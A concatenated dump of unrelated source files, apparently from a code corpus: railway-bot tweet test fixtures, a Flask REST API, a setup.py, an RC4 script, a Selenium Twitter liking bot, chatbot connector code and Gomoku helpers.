full_text='This tweet unusual tags Vol Ⅵ: #HH:HX #LP:K;#LP:KA+#LP:KALD bot%tl%xs%unusual%425',
expected_answer='HH#HX: Hauptbahnhof-Nord\nLP#K: Köln Hbf\nLP#KA: Karlsruhe Hbf\nLP#KALD: Kaldenkirchen',
id=425,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet unusual tags Vol Ⅶ: #UK:ABE #UK:ABER #NL:Ah;#NL:Ahg/#NL:Apn #NL:APD bot%tl%xs%unusual%426',
expected_answer='UK#ABE: Aber\nUK#ABER: Aber\nNL#Ah: Arnhem\nNL#Ahg: Arnhem Goederenstation\nNL#Apn: <NAME>',
id=426,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet unusual tags Vol Ⅷ: #FR:A?#FR:AA!#FR:AAA bot%tl%xs%unusual%427',
expected_answer='FR#A: Angouleme\nFR#AA: Aire sur l\'Adour\nFR#AAA: Allassac',
id=427,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet unusual tags Vol Ⅸ: $3640 #FFM:HB #FFM:_HB #FFM:211 #W:J $FFM:A3 bot%tl%xs%unusual%428',
expected_answer='3640: Frankfurt-Höchst - Bad Soden\nFFM#HB: Frankfurt Hauptbahnhof\nFFM#_HB: WA Hauptbahnhof\nFFM#211: Hauptbahnhof\nW#J: Jedlersdorf (in F)\nFFM$A3: Anschlussstrecke A3: Abzweig Nordwest - Ober<NAME>',
id=428,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet unusual tags Vol Ⅹ: $FFM:A $FFM:Aⅰ $FFM:AⅡ $FFM:AIII bot%tl%xs%unusual%429',
expected_answer='FFM$A: A-Strecke: Südbahnhof - Heddernheim - (Ginnheim/Bad Homburg/Oberursel)\nFFM$Aⅰ: A-Strecke Teilabschnitt 1 Humser Straße - Hauptwache\nFFM$AⅡ: A-Strecke Teilabschnitt 2 Hauptwache - Willy-Brandt-Platz\nFFM$AIII: A-Strecke Teilabschnitt 3 Humser Straße - Weißer Stein',
id=429,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet unusual tags Vol ⅰ: #_NO #249 #ÅBY bot%tl%mt%unusual%430',
expected_answer='NO#249: H-sign 249\nNO#ÅBY: Åneby',
id=430,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet unusual tags Vol ⅱ: #DS100 $VDE8¹ #_CH #600133 #ALT94 bot%tl%mt%unusual%431',
expected_answer='VDE8¹: Nürnberg-Erfurt\nCH#600133: UNO Linie 600, km 133.179\nCH#ALT94: Altstätten SG 94',
id=431,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet unusual tags Vol ⅲ: #_AT #Aa_G #Aa_Z9 #_AT #Z bot%tl%mt%unusual%432',
expected_answer='AT#Aa G: Grenze ÖBB-WLB im km 7,610\nAT#Aa Z9: Wr․ Neudorf\nAT#Z: Zell am See',
id=432,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet unusual tags Vol ⅳ: #_DS #AA_G #AAG #EM302 bot%tl%mt%unusual%433',
expected_answer='AA G: Hamburg-Altona Gbf\nAAG: Ascheberg (Holst)\nEM302: Oberhausen Sbk M302',
id=433,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet unusual tags Vol ⅴ: #DS100 #SARS_COV_2 #REKURSION #toggle bot%tl%mt%unusual%434',
expected_answer='SARS COV 2: Dieser Bot ist offiziell Virusfrei™ und immun. Kuscheln, Händchenhalten etc. ist erlaubt. Bitte nicht anniesen (weil ist eklig). Lasst euch impfen, sobald ihr die Gelegenheit bekommt!\nREKURSION: Siehe bitte #REKURSION',
id=434,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet unusual tags Vol ⅵ: #_HH #HX #_LP #K;#KA+#KALD bot%tl%mt%unusual%435',
expected_answer='HH#HX: Hauptbahnhof-Nord\nLP#K: Köln Hbf\nLP#KA: Karlsruhe Hbf\nLP#KALD: Kaldenkirchen',
id=435,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet unusual tags Vol ⅶ: #_UK #ABE #ABER #_NL #Ah;#Ahg/#Apn #APD bot%tl%mt%unusual%436',
expected_answer='GB#ABE: Aber\nGB#ABER: Aber\nNL#Ah: Arnhem\nNL#Ahg: Arnhem Goederenstation\nNL#Apn: <NAME>',
id=436,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet unusual tags Vol ⅷ: #_FR #A?#AA!#AAA bot%tl%mt%unusual%437',
expected_answer='FR#A: Angouleme\nFR#AA: Aire sur l\'Adour\nFR#AAA: Allassac',
id=437,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet unusual tags Vol ⅸ: #_DE $3640 #_FFM #HB #FFM:_HB #211 #_W #J #_FFM $A3 bot%tl%mt%unusual%438',
expected_answer='3640: Frankfurt-Höchst - Bad Soden\nFFM#HB: Frankfurt Hauptbahnhof\nFFM#_HB: WA Hauptbahnhof\nFFM#211: Hauptbahnhof\nW#J: Jedlersdorf (in F)\nFFM$A3: Anschlussstrecke A3: Abzweig Nordwest - Oberursel Hohemark',
id=438,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet unusual tags Vol ⅹ: #_FFM $A $Aⅰ $AⅡ $AIII bot%tl%mt%unusual%439',
expected_answer='FFM$A: A-Strecke: Südbahnhof - Heddernheim - (Ginnheim/Bad Homburg/Oberursel)\nFFM$Aⅰ: A-Strecke Teilabschnitt 1 Humser Straße - Hauptwache\nFFM$AⅡ: A-Strecke Teilabschnitt 2 Hauptwache - Willy-Brandt-Platz\nFFM$AIII: A-Strecke Teilabschnitt 3 Humser Straße - Weißer Stein',
id=439,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet media: #_FFM #HB #DS100 bot%tl%mt%mf%440',
expected_answer='FFM#HB: Frankfurt Hauptbahnhof\nRALP: Alpirsbach\nCH#HE: Herisau\nCH#MS: Münsingen',
extended_entities={'media': [{'ext_alt_text': '#RALP'},
{'ext_alt_text': '#_CH #HE'},
{'ext_alt_text': '#MS'}
]},
id=440,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet media w/o ext_alt: #_FFM #HB bot%tl%mt%mf%441',
expected_answer='FFM#HB: Frankfurt Hauptbahnhof',
extended_entities={'media': [{},
{}
]},
id=441,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet media w/o media: #_FFM #HB bot%tl%mt%mf%442',
expected_answer='FFM#HB: Frankfurt Hauptbahnhof',
extended_entities={},
id=442,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='This tweet #FF $1234 %Hp0 &Awanst /FFM:U2 bot%tl%sigil%450',
expected_answer='FF: Frankfurt (Main) Hbf\n1234: HH-Eidelstedt - Rothenburgsort\nHp0: Halt.\nAwanst: Ausweichanschlussstelle\nFFM/U2: Bad Homburg Gonzenheim - Nieder-Eschbach - Riedwiese - Heddernheim - Südbahnhof',
id=450,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='Blacklist #LZB &LZB bot%tl%bl%451',
expected_answer='LZB: Linienförmige Zugbeeinflussung',
id=451,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='Repeated things #FF #FF bot%tl%460',
expected_answer='FF: Frankfurt (Main) Hbf',
id=460,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='Repeated things #_FFM #DS:FF #DS100 #DE:FF #FF bot%tl%461',
expected_answer='FF: Frankfurt (Main) Hbf',
id=461,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='Bot precedence #AI #_CH #BOT:AI bot%tl%462',
expected_answer='CH#AI: Airolo\nAI: Dieser Bot besitzt keine Künstliche Intelligenz. Er ist sozusagen strunzdumm. Lernen kann der Bot nur, indem der Autor lernt und etwas neues dazuprogrammiert.',
id=462,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='Bot precedence #CH:AI #AI bot%tl%463',
expected_answer='CH#AI: Airolo\nAI: Dieser Bot besitzt keine Künstliche Intelligenz. Er ist sozusagen strunzdumm. Lernen kann der Bot nur, indem der Autor lernt und etwas neues dazuprogrammiert.',
id=463,
user=User.followed
))
list_of_tweets.append(TweepyMock(
full_text='Bot flag emoji \U0001F1E6\U0001F1F9 #FAQ:AUSLAND bot%tl%501',
expected_answer=('FAQ#AUSLAND: Kürzel mit X und Z haben als zweiten Buchstaben das Land: '
+ 'XA\U0001F1E6\U0001F1F9 '
+ 'XB\U0001F1E7\U0001F1EA '
+ 'XC\U0001f1f7\U0001f1fa '
+ 'XD\U0001f1e9\U0001f1f0 '
+ 'XE\U0001f1ea\U0001f1f8 '
+ 'XF\U0001f1eb\U0001f1f7 '
+ 'XG\U0001f1ec\U0001f1f7 '
+ 'XH\U0001f1eb\U0001f1ee '
+ 'XI\U0001f1ee\U0001f1f9 '
+ 'XJ\U0001f1f7\U0001f1f8 '
+ 'XK\U0001f1ec\U0001f1e7 '
+ 'XL\U0001f1f1\U0001f1fa '
+ 'XM\U0001f1ed\U0001f1fa '
+ 'XN\U0001f1f3\U0001f1f1 '
+ 'XO\U0001f1f3\U0001f1f4 '
+ 'XP\U0001f1f5\U0001f1f1 '
+ 'XQ\U0001f1f9\U0001f1f7 '
+ 'XR\U0001f1ed\U0001f1f7 '
+ 'XS\U0001f1e8\U0001f1ed '
+ 'XT\U0001f1e8\U0001f1ff '
+ 'XU\U0001f1f7\U0001f1f4 '
+ 'XV\U0001f1f8\U0001f1ea '
+ 'XW\U0001f1e7\U0001f1ec '
+ 'XX\U0001f1f5\U0001f1f9 '
+ 'XY\U0001f1f8\U0001f1f0 '
+ 'XZ\U0001f1f8\U0001f1ee '
+ 'ZA\U0001f1f2\U0001f1f0 '
+ 'ZB\U0001f1e7\U0001f1e6 '
+ 'ZE\U0001f1ea\U0001f1ea '
+ 'ZI\U0001f1ee\U0001f1ea '
+ 'ZK\U0001f1f0\U0001f1ff '
+ 'ZL\U0001f1f1\U0001f1f9 '
+ 'ZM\U0001f1f2\U0001f1e9 '
+ 'ZT\U0001f1f1\U0001f1fb '
+ 'ZU\U0001f1fa\U0001f1e6 '
+ 'ZW\U0001f1e7\U0001f1fe'
),
id=501,
user=User.followed
))
return list_of_tweets
def mocked_source():
try:
# pylint: disable=E0401,C0415
from tweet_details import list_of_tweets
except ModuleNotFoundError:
log_.critical("Keine Tweet-Details gefunden. Bitte get_tweet mit --mode mock ausführen.")
return []
return list_of_tweets
``` |
{
"source": "jonafato/ivadb",
"score": 2
} |
#### File: ivadb/ivadb/views.py
```python
from functools import wraps
from flask import Blueprint, render_template, request
from flask_restful import abort, fields, reqparse, marshal_with, Resource
from flask_security import current_user
from .core import api, db
from .models import Actor, Character, Series
from .utils import fields_from_model
bp = Blueprint('index', __name__)
@bp.route('/')
def index():
return render_template('index/index.html')
actor_fields = fields_from_model(Actor)
series_fields = fields_from_model(Series)
character_fields = fields_from_model(Character)
character_fields['actor'] = fields.Nested(actor_fields)
character_fields['series'] = fields.Nested(series_fields)
actor_parser = reqparse.RequestParser()
actor_parser.add_argument('name', type=str, required=True)
series_parser = reqparse.RequestParser()
series_parser.add_argument('name', type=str, required=True)
series_parser.add_argument('debut_year', type=int, required=True)
character_parser = reqparse.RequestParser()
character_parser.add_argument('name', type=str, required=True)
character_parser.add_argument('actor_id', type=int, required=True)
character_parser.add_argument('series_id', type=int, required=True)
def auth_to_modify(func):
@wraps(func)
def wrapper(*args, **kwargs):
if (request.method in ('POST', 'PUT', 'DELETE') and
not current_user.is_authenticated()):
abort(401)
return func(*args, **kwargs)
return wrapper
class ActorDetailResource(Resource):
method_decorators = [marshal_with(actor_fields), auth_to_modify]
def get(self, actor_id):
return Actor.query.get_or_404(actor_id)
def delete(self, actor_id):
actor = Actor.query.get(actor_id)
if actor:
db.session.delete(actor)
db.session.commit()
return '', 204
def put(self, actor_id):
args = actor_parser.parse_args()
actor = Actor.query.get(actor_id)
if not actor:
actor = Actor(id=actor_id)
db.session.add(actor)
actor.name = args['name']
db.session.commit()
return actor
class ActorListResource(Resource):
method_decorators = [marshal_with(actor_fields), auth_to_modify]
def get(self):
return Actor.query.all()
def post(self):
args = actor_parser.parse_args()
actor = Actor(**args)
db.session.add(actor)
db.session.commit()
return actor
class SeriesDetailResource(Resource):
method_decorators = [marshal_with(series_fields), auth_to_modify]
def get(self, series_id):
return Series.query.get_or_404(series_id)
def delete(self, series_id):
series = Series.query.get(series_id)
if series:
db.session.delete(series)
db.session.commit()
return '', 204
def put(self, series_id):
args = series_parser.parse_args()
series = Series.query.get(series_id)
if not series:
series = Series(id=series_id)
db.session.add(series)
series.name = args['name']
series.debut_year = args['debut_year']
db.session.commit()
return series
class SeriesListResource(Resource):
method_decorators = [marshal_with(series_fields), auth_to_modify]
def get(self):
return Series.query.all()
def post(self):
args = series_parser.parse_args()
series = Series(**args)
db.session.add(series)
db.session.commit()
return series
class CharacterDetailResource(Resource):
method_decorators = [marshal_with(character_fields), auth_to_modify]
def get(self, character_id):
return Character.query.get_or_404(character_id)
def delete(self, character_id):
character = Character.query.get(character_id)
if character:
db.session.delete(character)
db.session.commit()
return '', 204
def put(self, character_id):
args = character_parser.parse_args()
character = Character.query.get(character_id)
if not character:
character = Character(id=character_id)
db.session.add(character)
character.name = args['name']
character.actor_id = args['actor_id']
character.series_id = args['series_id']
db.session.commit()
return character
class CharacterListResource(Resource):
method_decorators = [marshal_with(character_fields), auth_to_modify]
def get(self):
return Character.query.all()
def post(self):
args = character_parser.parse_args()
character = Character(**args)
db.session.add(character)
db.session.commit()
return character
api.add_resource(ActorListResource, '/actors/')
api.add_resource(ActorDetailResource, '/actors/<int:actor_id>/')
api.add_resource(SeriesListResource, '/series/')
api.add_resource(SeriesDetailResource, '/series/<int:series_id>/')
api.add_resource(CharacterListResource, '/characters/')
api.add_resource(CharacterDetailResource, '/characters/<int:character_id>/')
``` |
{
"source": "jonafato/pytest-asyncio",
"score": 2
} |
#### File: jonafato/pytest-asyncio/setup.py
```python
import re
from pathlib import Path
from setuptools import setup, find_packages
def find_version():
version_file = Path(__file__).parent.joinpath('pytest_asyncio', '__init__.py').read_text()
version_match = re.search(r"^__version__ = ['\"]([^'\"]*)['\"]",
version_file, re.M)
if version_match:
return version_match.group(1)
raise RuntimeError("Unable to find version string.")
setup(
name='pytest-asyncio',
version=find_version(),
packages=find_packages(),
url='https://github.com/pytest-dev/pytest-asyncio',
license='Apache 2.0',
author='<NAME>',
author_email='<EMAIL>',
description='Pytest support for asyncio.',
long_description=Path(__file__).parent.joinpath('README.rst').read_text(),
classifiers=[
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: OSI Approved :: Apache Software License",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Topic :: Software Development :: Testing",
"Framework :: Pytest",
],
python_requires='>= 3.5',
install_requires=[
'pytest >= 3.0.6',
],
extras_require={
':python_version == "3.5"': 'async_generator >= 1.3',
'testing': ['coverage', 'async_generator >= 1.3'],
},
entry_points={
'pytest11': ['asyncio = pytest_asyncio.plugin'],
}
)
``` |
{
"source": "Jonah111122/tic-tac-toe",
"score": 4
} |
#### File: Jonah111122/tic-tac-toe/tictactoe.py
```python
class Player:
def __init__(self, symbol):
self.symbol = symbol
class Game:
def play(board, player, row, column):
board[row][column] = player.symbol
#Player uses numbers 1, 2 , 3 for horizontol movement and numbers 1, 2, 3 for vertical movement for example if player wanted to move to center of the board 2,2.
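# Minimal sketch (illustrative values): place a black stone in the centre square.
#   board = [[' '] * 3 for _ in range(3)]
#   Game.play(board, Player('b'), 1, 1)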
``` |
{
"source": "Jonah1234567/sliceSLAM",
"score": 3
} |
#### File: sliceSLAM/feature_matching/oscillator.py
```python
import numpy as np
from numba import jit, cuda
# move the second image not the first image
@jit(forceobj=True, target_backend='CUDA')
def oscillate(im1, im2):
min_diff = 9999999999
best_x, best_y = 0, 0
    for x in range(-50, 51, 10):  # coarse pass of a jank grid search; refined below, should eventually be a proper optimizer
for y in range(-50, 51, 10):
im_xi, im_xf, im_yi, im_yf = 0, 0, 0, 0 # better way to orient the different images?
if x > 0:
im_xi, im_xf = x, 0
elif x < 0:
im_xi, im_xf = 0, x
if y > 0:
im_yi, im_yf = y, 0
elif y < 0:
im_yi, im_yf = 0, y
im1_x, im1_y = np.shape(im1)
im2_x, im2_y = np.shape(im2)
temp_diff = m_norm_diff(im1[0 + im_xi:im1_x + im_xf, 0 + im_yi:im1_y + im_yf],
im2[0 - im_xf:im2_x - im_xi, 0 - im_yf:im2_y - im_yi]) # have fun
# understanding this later
if temp_diff < min_diff:
min_diff = temp_diff
best_x, best_y = x, y
for x in range(best_x - 5, best_x + 6, 1): # double-check the 6
for y in range(best_y - 5, best_y + 6, 1): # double-check the 6
im_xi, im_xf, im_yi, im_yf = 0, 0, 0, 0 # better way to orient the different images?
if x > 0:
im_xi, im_xf = x, 0
elif x < 0:
im_xi, im_xf = 0, x
if y > 0:
im_yi, im_yf = y, 0
elif y < 0:
im_yi, im_yf = 0, y
im1_x, im1_y = np.shape(im1)
im2_x, im2_y = np.shape(im2)
temp_diff = m_norm_diff(im1[0 + im_xi:im1_x + im_xf, 0 + im_yi:im1_y + im_yf],
im2[0 - im_xf:im2_x - im_xi, 0 - im_yf:im2_y - im_yi]) # have fun
# understanding this later
if temp_diff < min_diff:
min_diff = temp_diff
best_x, best_y = x, y
return best_x, best_y
def m_norm_diff(im1, im2): # manhattan normalization
if np.shape(im1) != np.shape(im2):
print("Warning submitted images do not match, fix this")
return 9999999999
norm_factor = len(im1) * len(im1[0])
diff = im1 - im2 # elementwise for np array
return sum(sum(abs(diff))) / norm_factor
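# Minimal usage sketch (assumed inputs; the recovered offset depends on image
# content):
#   im1 = np.random.rand(200, 200)
#   im2 = np.roll(im1, shift=(7, -3), axis=(0, 1))
#   best_x, best_y = oscillate(im1, im2)  # coarse grid, then local refinement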
``` |
{
"source": "JONAH5639/Twitter_Bot",
"score": 3
} |
#### File: JONAH5639/Twitter_Bot/Twitter_Bot.py
```python
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import time
class TwitterBot:
    def __init__(self, username, password):
        self.username = username
        self.password = password
        self.bot = webdriver.Firefox()
    def login(self):
        bot = self.bot
        bot.get('https://twitter.com/')
        time.sleep(3)
        email = bot.find_element_by_class_name('email-input')
        password = bot.find_element_by_name('session[password]')
        email.clear()
        password.clear()
        email.send_keys(self.username)
        password.send_keys(self.password)
        password.send_keys(Keys.RETURN)
        time.sleep(3)
def like_tweet(self, hashtag):
bot = self.bot
        bot.get('https://twitter.com/search?q=' + hashtag + '&src=typd')
time.sleep(3)
for i in range(1, 3):
            bot.execute_script('window.scrollTo(0, document.body.scrollHeight)')
time.sleep(2)
        tweets = bot.find_elements_by_class_name('tweet')
        links = [elem.get_attribute('data-permalink-path') for elem in tweets]
for link in links:
bot.get('https://twitter.com' + link)
try:
bot.find_element_by_class_name('HeartAnimation').click()
time.sleep(10)
            except Exception:
time.sleep(60)
ed = TwitterBot('yourEmail', 'yourPassword')
ed.login()
ed.like_tweet('#selenium')  # like_tweet requires a hashtag to search; '#selenium' is illustrative
``` |
{
"source": "jonahbaron/xml_authentication",
"score": 3
} |
#### File: jonahbaron/xml_authentication/rc4.py
```python
import base64
import argparse
def rc4(string,key):
string = [ord(char) for char in string]
key = [ord(char) for char in key]
klen = len(key)
    S = list(range(256))  # list(): range objects are immutable in Python 3
j = 0
for i in range(256):
j = (j + S[i] + key[i % klen]) % 256
S[i], S[j] = S[j], S[i]
i = 0
j = 0
newchars = []
for char in string:
i = (i + 1) % 256
j = (j + S[i]) % 256
S[i], S[j] = S[j], S[i]
newchars.append(char ^ S[(S[i] + S[j]) % 256])
newchars = [chr(char) for char in newchars]
newstring = ''.join(newchars)
return newstring
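# Minimal sketch (hypothetical values): RC4 is symmetric, so applying the same
# key twice recovers the plaintext:
#   ct = rc4('attack at dawn', 'secret')
#   rc4(ct, 'secret')  # -> 'attack at dawn'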
def encfile(fname,key,outfile):
with open(fname) as f:
fcontent = f.readlines()
#print fcontent
encoding = base64.b64encode
output = []
for pstring in fcontent:
pstring = pstring.strip()
        pstring = rc4(pstring, key)
        cstring = encoding(pstring.encode('latin-1')).decode('ascii')  # RC4 output of ASCII input fits latin-1
#print cstring
output.append(cstring + '\n')
#print output
with open(outfile, "wb") as f:
for line in output:
f.write(line)
def decfile(fname,key,outfile):
with open(fname) as f:
fcontent = f.readlines()
#print fcontent
decoding = base64.b64decode
output = []
for cstring in fcontent:
cstring = cstring.strip()
        cstring = decoding(cstring).decode('latin-1')  # bytes -> str for rc4()
        pstring = rc4(cstring, key)
#print pstring
output.append(pstring + '\n')
#print output
with open(outfile, "wb") as f:
for line in output:
f.write(line)
def main():
parser = argparse.ArgumentParser(description="Encrypt or decrypt a file with RC4")
#parser.add_argument("filename", type=str, help="file to encrypt or decrypt")
parser.add_argument("key", type=str, help="key/password to encrypt or decrypt")
parser.add_argument("-e", "--encrypt", type=str, help="file to encrypt")
parser.add_argument("-d", "--decrypt", type=str, help="file to decrypt")
parser.add_argument("-o", "--output", type=str, help="output file", default="output.txt")
args = parser.parse_args()
if args.encrypt is not None:
encfile(args.encrypt,args.key,args.output)
elif args.decrypt is not None:
decfile(args.decrypt,args.key,args.output)
else:
print "RC4 Encryptor/Decryptor"
print "Please rerun script with the -e or -d flag"
if __name__ == "__main__":
main()
``` |
{
"source": "jonahbarrett/roodbot",
"score": 2
} |
#### File: roodbot/connectors/connector_common.py
```python
from markov_engine import MarkovTrieDb, MarkovFilters, MarkovGenerator
from models.structure import StructureModelScheduler
from common.nlp import CapitalizationMode
from typing import Optional, List
from multiprocessing import Process, Queue, Event
from threading import Thread
from queue import Empty
from spacy.tokens import Doc
from storage.armchair_expert import InputTextStatManager
import numpy as np
import random
class ConnectorRecvMessage(object):
def __init__(self, text: str, learn: bool=False, reply=True):
self.text = text
self.learn = learn
self.reply = reply
class ConnectorReplyGenerator(object):
def __init__(self, markov_model: MarkovTrieDb,
structure_scheduler: StructureModelScheduler):
self._markov_model = markov_model
self._structure_scheduler = structure_scheduler
self._nlp = None
def give_nlp(self, nlp):
self._nlp = nlp
def generate(self, message: str, doc: Doc = None, ignore_topics: List[str] = []) -> Optional[str]:
if doc is None:
filtered_message = MarkovFilters.filter_input(message)
doc = self._nlp(filtered_message)
subjects = []
for token in doc:
if(token.text in ignore_topics):
continue
markov_word = self._markov_model.select(token.text)
if markov_word is not None:
subjects.append(markov_word)
if len(subjects) == 0:
UNHEARD_LIST = ["Didn’t catch that",
"Try again",
"Are you even trying",
"That might be too much for me right now",
"I’ll learn how eventually",
"I don't know how to respond to that yet"]
UNHEARD_RESPONSE = random.choice(UNHEARD_LIST)
return UNHEARD_RESPONSE
def structure_generator():
sentence_stats_manager = InputTextStatManager()
while True:
choices, p_values = sentence_stats_manager.probabilities()
if len(choices) > 0:
num_sentences = np.random.choice(choices, p=p_values)
else:
num_sentences = np.random.randint(1, 5)
yield self._structure_scheduler.predict(num_sentences=num_sentences)
generator = MarkovGenerator(structure_generator=structure_generator(), subjects=subjects)
reply_words = []
sentences = generator.generate(db=self._markov_model)
if sentences is None:
MISUNDERSTOOD_LIST = ['Huh.',
'Huh',
'Huh!',
'Huh?',
'Huh!?',
'HUH?']
            MISUNDERSTOOD_RESPONSE = random.choice(MISUNDERSTOOD_LIST)
            return MISUNDERSTOOD_RESPONSE
for sentence in sentences:
for word_idx, word in enumerate(sentence):
if not word.compound:
text = CapitalizationMode.transform(word.mode, word.text)
else:
text = word.text
reply_words.append(text)
reply = " ".join(reply_words)
filtered_reply = MarkovFilters.smooth_output(reply)
return filtered_reply
class ConnectorWorker(Process):
def __init__(self, name, read_queue: Queue, write_queue: Queue, shutdown_event: Event):
Process.__init__(self, name=name)
self._read_queue = read_queue
self._write_queue = write_queue
self._shutdown_event = shutdown_event
self._frontend = None
def send(self, message: ConnectorRecvMessage):
return self._write_queue.put(message)
def recv(self) -> Optional[str]:
return self._read_queue.get()
def run(self):
pass
class ConnectorScheduler(object):
def __init__(self, shutdown_event: Event):
self._read_queue = Queue()
self._write_queue = Queue()
self._shutdown_event = shutdown_event
self._worker = None
def recv(self, timeout: Optional[float]) -> Optional[ConnectorRecvMessage]:
try:
return self._read_queue.get(timeout=timeout)
except Empty:
return None
def send(self, message: str):
self._write_queue.put(message)
def start(self):
self._worker.start()
def shutdown(self):
self._worker.join()
class Connector(object):
def __init__(self, reply_generator: ConnectorReplyGenerator, connectors_event: Event):
self._reply_generator = reply_generator
self._scheduler = None
self._thread = Thread(target=self.run)
self._write_queue = Queue()
self._read_queue = Queue()
self._frontends_event = connectors_event
self._shutdown_event = Event()
self._muted = True
def give_nlp(self, nlp):
self._reply_generator.give_nlp(nlp)
def start(self):
self._scheduler.start()
self._thread.start()
def run(self):
while not self._shutdown_event.is_set():
message = self._scheduler.recv(timeout=0.2)
if self._muted:
self._scheduler.send(None)
elif message is not None:
# Receive the message and put it in a queue
self._read_queue.put(message)
# Notify main program to wakeup and check for messages
self._frontends_event.set()
# Send the reply
reply = self._write_queue.get()
self._scheduler.send(reply)
def send(self, message: str):
self._write_queue.put(message)
def recv(self) -> Optional[ConnectorRecvMessage]:
if not self._read_queue.empty():
return self._read_queue.get()
return None
def shutdown(self):
# Shutdown event signals both our thread and process to shutdown
self._shutdown_event.set()
self._scheduler.shutdown()
self._thread.join()
def generate(self, message: str, doc: Doc=None) -> str:
return self._reply_generator.generate(message, doc)
def mute(self):
self._muted = True
def unmute(self):
self._muted = False
def empty(self):
return self._read_queue.empty()
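# Minimal wiring sketch (DiscordConnector is a hypothetical concrete subclass):
# a connector forwards incoming messages to the main loop and ships replies back:
#   conn = DiscordConnector(reply_generator, connectors_event)
#   conn.start()
#   msg = conn.recv()                  # ConnectorRecvMessage or None
#   if msg is not None:
#       conn.send(conn.generate(msg.text))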
``` |
{
"source": "jonahbron/Lock",
"score": 2
} |
#### File: Lock/lock/main.py
```python
import click
from lock.app import actions
@click.group()
def cli():
    '''Lock is a simple tool for securely storing and sharing
    sensitive information.
'''
cli.add_command(actions.add)
cli.add_command(actions.get)
``` |
{
"source": "jonah-chen/alphazero-guerzhoy",
"score": 3
} |
#### File: alphazero-guerzhoy/15x15/debug.py
```python
import numpy as np
# from gomoku import print_board
import trainGomoku as gm
from game import print_board
from nptrain import is_win
def random_board(shape, bad=False):
board = np.random.randint(-1, 2, size=shape)
if bad:
return convert_good_to_bad_board(board)
return board
def convert_good_to_bad_board(good_board):
bad_board = good_board.tolist()
for i in range(len(bad_board)):
for j in range(len(bad_board[0])):
if bad_board[i][j] == 0:
bad_board[i][j] = ' '
elif bad_board[i][j] == 1:
bad_board[i][j] = 'b'
elif bad_board[i][j] == -1:
bad_board[i][j] = 'w'
return bad_board
def convert_to_one_hot(bad):
arr = np.zeros((15, 15, 2,), dtype='float32')
for i in range(15):
for j in range(15):
if bad[i][j] == 'b':
arr[i, j, 0] = 1.0
elif bad[i][j] == 'w':
arr[i, j, 1] = 1.0
return arr
if __name__ == '__main__':
prob = [['', ' ', ' ', 'b', ' ', ' ', '', 'w'],
['b', '', 'b', 'w', 'w', '', ' ', 'w'],
['b', '', 'w', 'b', 'b', 'w', ' ', 'b'],
[' ', '', 'w', '', 'b', ' ', 'b', ''],
['w', 'w', 'w', 'b', 'w', ' ', 'b', 'w'],
['w', '', 'b', 'w', 'b', 'w', '', ''],
['w', '', 'b', 'b', '', '', 'w', ' '],
['b', 'w', 'w', ' ', 'b', '', 'b', ' ']]
prob = convert_to_one_hot(prob)
print_board(prob)
print(is_win(prob))
# gm.init()
# gm.print_board()
# turns = 0
# while(gm.is_win() == 0):
# y = int(input("\nyval"))
# x = int(input("\nxval"))
# if turns % 2 == 0:
# if gm.move(y,x,1) == 0:
# turns += 1
# gm.print_board()
# else:
# if gm.move(y,x,2) == 0:
# turns += 1
# gm.print_board()
# pie = np.load('selfplay_data/0000/pie.npy')
# z = np.load('selfplay_data/0000/z.npy')
# s = np.load('selfplay_data/0000/s.npy')
#
# print(f'{pie.shape} {z.shape} {s.shape}')
#
# for i in range(100):
# print(pie[i])
# print_board(s[i])
```
#### File: alphazero-guerzhoy/15x15/gomoku.py
```python
def is_empty(board):
'''Return True iff the board is empty
'''
for i in board:
for j in i:
if ' ' != j:
return False
return True
def is_bounded(board, y_end, x_end, length, d_y, d_x):
'''Return 'OPEN' for open sequences, 'SEMIOPEN' for semiopen sequences
and 'CLOSED' for closed sequences. Open, Semipoen, and Closed are
defined in ESC180H1F
'''
# Check (y_end + d_y, x_end + d_x) is empty
# or (y_end - length * d_y, x_end - length * d_x) is empty
    y1, x1, y2, x2 = y_end + d_y, x_end + d_x, y_end - length * d_y, x_end - length * d_x
    board_size = len(board)  # renamed: avoid clobbering the 'length' parameter
    state = 1
    # If one end exceeds the border, no stones can be placed, or if the square is occupied.
    # The 'or' short-circuits, so no index error should be thrown
    if (y1 < 0 or x1 < 0 or y1 >= board_size or x1 >= board_size or board[y1][x1] != ' '):
        state -= 1
    if (y2 < 0 or x2 < 0 or y2 >= board_size or x2 >= board_size or board[y2][x2] != ' '):
        state -= 1
# hAhA nO SwitCH StATeMenT iN pYThoN
if state == 1:
return 'OPEN'
if state == 0:
return 'SEMIOPEN'
if state == -1:
return 'CLOSED'
return 'ERROR!'
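# Example (mirrors test_is_bounded below): a vertical run of three 'w' stones
# at (1,5)-(3,5) with empty squares beyond both ends reports 'OPEN':
#   is_bounded(board, 3, 5, 3, 1, 0)  # y_end=3, x_end=5, length=3, d_y=1, d_x=0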
def detect_row(board, col, y_start, x_start, length, d_y, d_x):
'''Return a tuple whose first element is the number of open sequences
